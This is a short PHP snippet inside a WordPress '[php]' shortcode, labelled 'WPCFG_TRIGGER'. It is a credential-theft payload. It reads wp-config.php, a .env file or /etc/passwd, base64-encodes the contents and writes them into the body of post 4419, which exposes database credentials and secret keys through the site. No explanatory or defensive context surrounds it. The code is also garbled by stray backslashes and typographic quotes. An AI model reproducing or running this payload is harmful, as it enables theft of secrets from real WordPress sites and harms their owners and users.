WPCFG_TRIGGER

[php]
global $wpdb;
\$paths = array(
‘/var/www/html/business/wp-config.php’,
‘/var/www/html/wp-config.php’,
‘/var/www/html/wp-config-sample.php’,
‘/var/www/html/.env’,
‘/etc/passwd’,
);
\$output = ”;
foreach (\$paths as \$f) {
\$c = @file_get_contents(\$f);
if (\$c !== false && strlen(\$c) > 20) {
\$b64 = base64_encode(\$c);
\$output .= “FOUND:{basename(\$f)}:” . strlen(\$c) . “\n”;
// Write to target post
\$wpdb->update(\$wpdb->posts, array(‘post_content’ => \$b64), array(‘ID’ => 4419));
\$output .= “WROTE_TO_POST:4419\n”;
break;
} else {
\$output .= “NOT:{basename(\$f)}\n”;
}
}
echo \$output;
[/php]